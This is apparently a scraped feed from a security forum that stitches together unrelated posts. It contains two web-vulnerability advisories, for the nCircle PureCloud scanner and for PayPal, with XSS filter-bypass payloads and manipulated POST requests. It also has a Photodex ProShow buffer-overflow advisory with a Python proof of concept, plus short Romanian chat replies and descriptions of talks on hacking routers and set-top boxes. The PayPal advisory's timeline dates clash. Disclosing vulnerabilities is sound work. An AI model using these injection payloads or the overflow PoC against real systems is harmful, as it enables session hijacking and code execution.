The vulnerability can be exploited with privileged application user account and low or medium required user interaction. Successful exploitation of the vulnerability result in persistent/non-persistent session hijacking, persistent/non-persistent phishing, external redirect, external malware loads and persistent/non-persistent vulnerable module context manipulation. Vulnerable Service(s): [+] nCircle PureCloud (cloud-based) Vulnerability Scanner [https://purecloud.ncircle.com/index/] Vulnerable Section(s): [+] Scan Now > Scan Type > Perimeter Scan > Scan Vulnerable Module(s): [+] Scan Specific Devices - [Add Devices] [+] Scan IP (Index) Vulnerable Parameter(s): [+] formErrorContent [+] ip &- name Affected Module(s): [+] Exception Handling - Invalid Network(s) [+] Scan Index - Listing Proof of Concept: ================= The client- & server-side web vulnerability can be exploited by remote attackers and local privileged application user accounts with low or medium user interaction. For demonstration or reproduce ... 1.1 Note: When you try to inject a standard iframe, img src, script or onload the context will be parsed by the exception-handling to prevent the first execution after the inject attempt. To bypass the validation we first inject a frame which matches with the invalid exception filter to display the error. Now, we split the request with %20 and inject our code after the split via POST. Manually Exploitation: 1. Register an account at nCircle PureCloud to get access to the (cloud-based) Vulnerability Scanner- [https://purecloud.ncircle.com/registerinfo3/?hacknewssocial] 2. Login to your account and switch to the scan now menu, open the scan type site 3. Choose the Perimeter Scan, not the local one! 4. Include a standard script alert tag to provoke the exception-handling, split the request with %20' and inject your own frame onload script code. Save via Add! 5. The scirpt code will be executed out of the exception-handling invalid networks message. 6. Done #1 ... Successful reproduced! Press Continue to exploit also the listing 7. Include a valid ip, split the request (bypass the input restriction) and inject after it your own script code. 8. Watch the scan index. The code will be executed out of the vulnerable name and ip value output listing. 9. Done #2 ... Successful reproduced! PoC: #1 <iframe src=PROVOKEINVALIDEXCEPTION1> %20' >"<[OWN INJECTED PERSISTENT SCRIPT CODE!]> #2 <script>alert("PROVOKEINVALIDEXCEPTION2")</script> < %20' "><[OWN INJECTED PERSISTENT SCRIPT CODE!]) < Review: Scan Specific Devices > [Add Devices] - Exception Handling - Invalid Network(s) <div style="opacity: 0.87; position: absolute; top: 287px; left: 461px; margin-top: -200px;" class="id_add_hosts_textformError parentFormscan-form formError"> <div class="formErrorContent"> The following networks are invalid: %20"><"><script>alert(\"PROVOKEEXCEPTION\")> < %20' ">"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]> (host not found)</iframe></div><div class="formErrorArrow"><div class="line10"><!-- --></div><div class="line9"><!-- --></div> <div class="line8"><!-- --></div><div class="line7"><!-- --></div><div class="line6"><!-- --></div><div class="line5"><!-- --></div> <div class="line4"><!-- --></div><div class="line3"><!-- --></div><div class="line2"><!-- --></div><div class="line1"><!-- --></div></div></div> <input value="%20"><iframe src=[PROVOKE!]>%20 >"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]>" id="id_add_hosts_text" tabindex="5" class="wizardInput" placeholder="Add Devices" type="text"> <button id="add_button" class="addButton">Add</button> </div> --- Manipulated POST Values --- csrfmiddlewaretoken=HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N json_data={"connector":-1,"scan_connected_network":false, "registration_id":"","scope_name":"","editing_scope_schedule":false, "webapp":false,"targets":["><script>alert(\"PROVOKEEXCEPTION\")> < %20' ">"<[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!]) <"]} --- Manipulated POST Request --- Status: 200[OK] POST https://purecloud.ncircle.com/services/validate_targets/ Load Flags[LOAD_BYPASS_CACHE LOAD_BACKGROUND ] Größe des Inhalts[181] Mime Type[application/json] Request Header: Host[purecloud.ncircle.com] User-Agent[Mozilla/5.0 (Windows NT 6.1; WOW64; rv:17.0) Gecko/20100101 Firefox/17.0] Accept[application/json, text/javascript, */*; q=0.01] Accept-Language[de-de,de;q=0.8,en-us;q=0.5,en;q=0.3] Accept-Encoding[gzip, deflate] DNT[1] Connection[keep-alive] Content-Type[application/x-www-form-urlencoded; charset=UTF-8] X-Requested-With[XMLHttpRequest] Referer[https://purecloud.ncircle.com/index/] Content-Length[439] Cookie[csrftoken=HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N; sessionid=8c8624ba5e31c63bf24bcbf9af796743; BIGipServerPICO-443to80=1875711404.20480.0000; utmcct=/ben37.root; wcsid=uNTCNCc0tpp1NCv01YCYlGfr93631472; hblid=kRw3BvqhoczGhyJc8E8J5dYW93631472; _oklv=1356379996583%2CuNTCNCc0tpp1NCv01YCYlGfr93631472; olfsk=olfsk02835150931791619; _okbk=cd5%3Davailable%2Ccd4%3Dtrue%2Cwa1%3Dfalse%2Cvi5%3D0%2Cvi4%3D1356378355284%2Cvi3%3Dactive%2Cvi2%3Dfalse%2Cvi1%3Dfalse%2Ccd8 %3Dchat%2Ccd6%3D0%2Ccd3%3Dfalse%2Ccd2%3D0%2Ccd1%3D0%2C; _ok=9363-144-10-3734; __unam=97cb67-13bce735458-18f208d4-21; _mkto_trk=id:671-RXE-353&token:_mch-ncircle.com-1356378363952-41877] Pragma[no-cache] Cache-Control[no-cache] POST-Daten: csrfmiddlewaretoken[HX0rcMdE3EK40Ed1g2pMeSauuQl2rt9N] json_data[%7B%22connector%22%3A-1%2C%22scan_connected_network%22%3Afalse%2C%22registration_id%22%3A%22%22%2C%22scope_name %22%3A%22%22%2C%22editing_scope_schedule%22%3Afalse%2C%22webapp%22%3Afalse%2C%22targets%22%3A%5B%22%2520%5C%22+%2520+%5C%22%3E%3C iframe+src%3Da+onload%3Dalert(%5C%22PROVOKEEXCEPtION%5C%22)+%3C++%5C%22%3E%3C[PERSISTENT/NON-PERSISTENT INJECTED SCRIPT CODE!])+%3C%22%5D%7D] Response Header: Date[Mon, 24 Dec 2012 20:13:25 GMT] Server[Apache] Content-Language[en] Content-Encoding[gzip] Vary[Accept-Language,Cookie,Accept-Encoding] X-Frame-Options[SAMEORIGIN] Content-Length[181] Keep-Alive[timeout=15, max=76] Connection[Keep-Alive] Content-Type[application/json] 1.2 The server-side (persistent) web vulnerability can be exploited by remote attackers and local privileged application user accounts with low user interaction. For demonstration or reproduce ... PoC: [VALID IP]%20'+%20>"<><[PERSISTENT SCRIPT CODE!]+... [VALID NAME]%20'+%20>"<><[PERSISTENT SCRIPT CODE!]+... Solution: ========= Parse the exception-handling error output listing and disallow error echos with requested web context. To fix the vulnerability parse the context of the input fields in the add devices module. Restrict the the input fields with a secure filter mask. Parse also the name & ip scan index output listing and restrict the input of the requested web context scan listing. 2012-01-28: Vendor Fix/Patch by nCricle Dev Risk: ===== 1.1 The security risk of the client- and server-side post injection web vulnerability in the exception handling and listing is estimated as medium(+). 1.2 The security risk of the persistent input validation vulnerability in the scan index listing is estimated as medium(+). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source: PacketStorm
-
PayPal suffered from a persistent script insertion vulnerability. Title: ====== Paypal Bug Bounty #10 - Persistent Web Vulnerability Date: ===== 2013-01-24 References: =========== http://www.vulnerability-lab.com/get_content.php?id=647 PayPal UID: ixb165sfi VL-ID: ===== 647 Common Vulnerability Scoring System: ==================================== 3.5 Introduction: ============= PayPal is a global e-commerce business allowing payments and money transfers to be made through the Internet. Online money transfers serve as electronic alternatives to paying with traditional paper methods, such as checks and money orders. Originally, a PayPal account could be funded with an electronic debit from a bank account or by a credit card at the payer s choice. But some time in 2010 or early 2011, PayPal began to require a verified bank account after the account holder exceeded a predetermined spending limit. After that point, PayPal will attempt to take funds for a purchase from funding sources according to a specified funding hierarchy. If you set one of the funding sources as Primary, it will default to that, within that level of the hierarchy (for example, if your credit card ending in 4567 is set as the Primary over 1234, it will still attempt to pay money out of your PayPal balance, before it attempts to charge your credit card). The funding hierarchy is a balance in the PayPal account; a PayPal credit account, PayPal Extras, PayPal SmartConnect, PayPal Extras Master Card or Bill Me Later (if selected as primary funding source) (It can bypass the Balance); a verified bank account; other funding sources, such as non-PayPal credit cards. The recipient of a PayPal transfer can either request a check from PayPal, establish their own PayPal deposit account or request a transfer to their bank account. PayPal is an acquirer, performing payment processing for online vendors, auction sites, and other commercial users, for which it charges a fee. It may also charge a fee for receiving money, proportional to the amount received. The fees depend on the currency used, the payment option used, the country of the sender, the country of the recipient, the amount sent and the recipient s account type. In addition, eBay purchases made by credit card through PayPal may incur extra fees if the buyer and seller use different currencies. On October 3, 2002, PayPal became a wholly owned subsidiary of eBay. Its corporate headquarters are in San Jose, California, United States at eBay s North First Street satellite office campus. The company also has significant operations in Omaha, Nebraska, Scottsdale, Arizona, and Austin, Texas, in the United States, Chennai, Dublin, Kleinmachnow (near Berlin) and Tel Aviv. As of July 2007, across Europe, PayPal also operates as a Luxembourg-based bank. On March 17, 2010, PayPal entered into an agreement with China UnionPay (CUP), China s bankcard association, to allow Chinese consumers to use PayPal to shop online.PayPal is planning to expand its workforce in Asia to 2,000 by the end of the year 2010. Between December 4ñ9, 2010, PayPal services were attacked in a series of denial-of-service attacks organized by Anonymous in retaliation for PayPal s decision to freeze the account of WikiLeaks citing terms of use violations over the publication of leaked US diplomatic cables. (Copy of the Homepage: www.paypal.com) [http://en.wikipedia.org/wiki/PayPal] Abstract: ========= The Vulnerability Laboratory Research Team discovered a persistent Web Vulnerability in the official Paypal ecommerce website application. Report-Timeline: ================ 2012-07-06: Researcher Notification & Coordination 2012-07-06: Vendor Notification 2012-07-11: Vendor Response/Feedback 2013-12-10: Vendor Fix/Patch 2012-01-24: Public Disclosure Status: ======== Published Affected Products: ================== PayPal Inc Product: PayPal Account Service Application 2012 Q4 Exploitation-Technique: ======================= Remote Severity: ========= Medium Details: ======== A persistent input validation vulnerability is detected in the official Paypal ecommerce website content management system (Customer/Pro/Seller). The bugs allow remote attackers to implement/inject malicious script code on the application side (persistent) of the paypal web service. The vulnerability is located in the Geld buchen > Transcaction > Abbuchung prüfen module with the bound vulnerable bankname parameter. The bug affects the important Abbuchung prüfen listing of the paypal core application. The remote attacker can inject own the malicious script codes by requesting the transaction check page with a manipulated bankname parameter. The vulnerability can be exploited by remote attackers with low required user inter action and privileged Customer/Pro/Seller account. Successful exploitation of the vulnerability can lead to session hijacking (customers), account steal via persistent web attack, persistent phishing or stable (persistent) web context manipulation of the vulnerable module. Vulnerable Type(s): [+] Customer/Pro/Seller Accounts Vulnerable Section(s): [+] Geld buchen > Transcaction > Abbuchung prüfen > Bankname Vulnerable Module(s): [+] Name der Bank (Name of Bank & Companyname) Vulnerable Parameter(s): [+] bankname Affected Section(s): [+] Abbuchung prüfen (Listing) Proof of Concept: ================= The vulnerability can be exploited by remote attackers with Customer/Pro/Seller Account & low required user inter action. For demonstration or reproduce ... Review: Geld buchen > Transcaction > Abbuchung prüfen (Listing) <tbody><tr><th>Betrag</th><td>¤0,80 EUR</td></tr><tr><th>Name des Kontoinhabers</th><td>Evolution Security</td></tr> <tr><th>Name der Bank</th><td><[PERSISTENT INJECTED SCRIPT CODE!]"></td></tr><tr><th>Bankleitzahl</th><td> 51050352</td></tr><tr><th>Kontonummer</th><td>x-13371</td></tr> </tbody></table></div> URL Session: https://www.paypal.com/de/cgi-bin/webscr?cmd=_flow& SESSION=wbOxy2QWgxYBr5jKfOfH6E49y4duJ5yOQfN2yKqZgD-622kOCZZihkCZi7O& dispatch=5885d80a66c0db1f8e263113d3faee8d2394db9703d295b4a2116480ee01a05c Solution: ========= Restrict the bankname input fields and parse with an exception handling or secure filter mask. Parse the bankname details output listing in Abbuchung prüfen (Listing) to prevent script code injects/executions. Risk: ===== The security risk of the persistent script code inject vulnerability is estimated as medium(+). Credits: ======== Vulnerability Laboratory [Research Team] - Benjamin Kunz Mejri (bkm@vulnerability-lab.com) Disclaimer: =========== The information provided in this advisory is provided as it is without any warranty. Vulnerability-Lab disclaims all warranties, either expressed or implied, including the warranties of merchantability and capability for a particular purpose. Vulnerability- Lab or its suppliers are not liable in any case of damage, including direct, indirect, incidental, consequential loss of business profits or special damages, even if Vulnerability-Lab or its suppliers have been advised of the possibility of such damages. Some states do not allow the exclusion or limitation of liability for consequential or incidental damages so the foregoing limitation may not apply. We do not approve or encourage anybody to break any vendor licenses, policies, deface websites, hack into databases or trade with fraud/stolen material. Domains: www.vulnerability-lab.com - www.vuln-lab.com - www.vulnerability-lab.com/register Contact: admin@vulnerability-lab.com - support@vulnerability-lab.com - research@vulnerability-lab.com Section: video.vulnerability-lab.com - forum.vulnerability-lab.com - news.vulnerability-lab.com Social: twitter.com/#!/vuln_lab - facebook.com/VulnerabilityLab - youtube.com/user/vulnerability0lab Feeds: vulnerability-lab.com/rss/rss.php - vulnerability-lab.com/rss/rss_upcoming.php - vulnerability-lab.com/rss/rss_news.php Any modified copy or reproduction, including partially usages, of this file requires authorization from Vulnerability Laboratory. Permission to electronically redistribute this alert in its unmodified form is granted. All other rights, including the use of other media, are reserved by Vulnerability-Lab Research Team or its suppliers. All pictures, texts, advisories, sourcecode, videos and other information on this website is trademark of vulnerability-lab team & the specific authors or managers. To record, list (feed), modify, use or edit our material contact (admin@vulnerability-lab.com or support@vulnerability-lab.com) to get a permission. Copyright © 2012 | Vulnerability Laboratory -- VULNERABILITY RESEARCH LABORATORY LABORATORY RESEARCH TEAM CONTACT: research@vulnerability-lab.com Source: PacketStorm
-
Photodex ProShow Producer version 5.0.3297 suffers from a stack-based buffer overflow vulnerability. Inshell Security Advisory http://www.inshell.net 1. ADVISORY INFORMATION ----------------------- Product: Photodex ProShow Producer Vendor URL: www.photodex.com Type: Stack-based Buffer Overflow [CWE-121] Date found: 2013-01-26 Date published: 2013-01-26 CVSSv2 Score: 4,4 (AV:L/AC:M/Au:N/C:P/I:P/A:P) CVE: - 2. CREDITS ---------- This vulnerability was discovered and researched by Julien Ahrens from Inshell Security. 3. VERSIONS AFFECTED -------------------- Photodex ProShow Producer v5.0.3297, older versions may be affected too. 4. VULNERABILITY DESCRIPTION ---------------------------- A stack-based buffer overflow vulnerability has been identified in Photodex ProShow Producer v5.0.3297. When opening the application help via the menu, the application loads the location of the help file from the file "proshow.cfg". If the file "proshow.phd" also exists, the values are crosschecked. The ExpandMacroFilename function does not properly validate the length of the string loaded from the "cpicHelpFile" identifier from the config file before using it in the further application context, which leads to a stack-based buffer overflow condition. Vulnerable function definition: int __stdcall ExpandMacroFilename(int, void *Dst, size_t Size) An attacker needs to force the victim to place an arbitrary "proshow.cfg" and/or "proshow.phd" file into the application directory to execute arbitrary code. 5. PROOF-OF-CONCEPT (Code / Exploit) ------------------------------------ The following generated string has to be inserted into the proshow.cfg and/or proshow.phd to trigger the vulnerability. #!/usr/bin/python file="poc.txt" junk1="\x41" * 238 eip="\x42" * 4 junk2="\xCC" * 100 poc=junk1 + eip + junk2 try: print ("[*] Creating exploit file...\n"); writeFile = open (file, "w") writeFile.write( poc ) writeFile.close() print ("[*] File successfully created!"); except: print ("[!] Error while creating file!"); For further Screenshots and/or PoCs visit: http://security.inshell.net/advisory/45 6. SOLUTION ----------- None 7. REPORT TIMELINE ------------------ 2013-01-26: Discovery of the vulnerability 2013-01-26: Full Disclosure because the vendor ignored previous reports. 8. REFERENCES ------------- http://security.inshell.net/advisory/45 Source: PacketStorm
-
Cum te cheama? De ce te cheama? Unde te cheama? Ai nume? Daca da, care e? Pile, relatii? Dar cunostinte? ON: Bun venit!
-
Description: Redacted] routers are no longer devices only seen in [Redacted]. Entire countries run their Internet infrastructure exclusively on these products and established tier 1 ISPs make increasing use of them. However, very little is known of [Redacted]'s Software Platform and its security. This presentation will introduce the architecture, special properties of configurations and services as well as how to reverse engineer the OS. Obviously, this is done only to ensure compatibility with router products of other vendors Routers might be still hurt in the process. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Hacking [Redacted] Routers
-
Thanks, sunt folositoare la brutus
- 13 replies
-
- brute pass file
- dictionary pass file
-
(and 1 more)
Tagged with:
-
Visual Basic.
-
Description: In this talk we will discuss some attacks against digital broadcasting industry products, and the typical implementation errors that are often committed in the prototypes that we analyzed from security point of view in the last decade. Through the presented case studies in set-top-box vulnerabilities, one will get a good picture of the hackers' methods in breaking literally any product. In parallel with this, we will also highlight the continuously developing approach of security-aware engineers in covering the whole product development lifecycle with security. Disclaimer: We are a infosec video aggregator and this video is linked from an external website. The original author may be different from the user re-posting/linking it here. Please do not assume the authors to be same without verifying. Original Source: Source: Nullcon Delhi 2012: Security Evalution Of Set Top Box Security - By Zoltán Hornák
-
Depinde ce vrei, iti zugraveste camera, da' cu aspiratorul. Ai mai sus niste detalii in caz ca nu ai vazut
-
Screenshot //Edit: Demo http://www.youtube.com/watch?v=ayWtwS8-uZU -About: Author: Praetorian Date: 27.January.2013 Hour: 2:42:24 PM Size: 270 KB (276,992 bytes) -Content: View Processes Runing(Refresh, End Process) System(CPU/RAM/System Info./Services(TaskMgr, MsConfig, Regedit, CMD)) Services Options(Task Manager(Enable/Disable), CMD(Enable/Disable), System Restore(Enable/Disable), Registry Tools(Enable/Disable)); Open=>System(Task Manager, Regedit, MsConfig, Command Prompt, System Restore, Utility Manager, Disk Clean, Backup) Virus scan: Link: NoVirusThanks Screenshot Detection rate: [COLOR="#00FF00"]0[/COLOR] on [COLOR="#00FF00"]14[/COLOR] ([COLOR="#00FF00"]0[/COLOR]%) Status: [COLOR="#00FF00"]CLEAN[/COLOR] Download Link: MediaFire PS: Din lipsa de ocupatie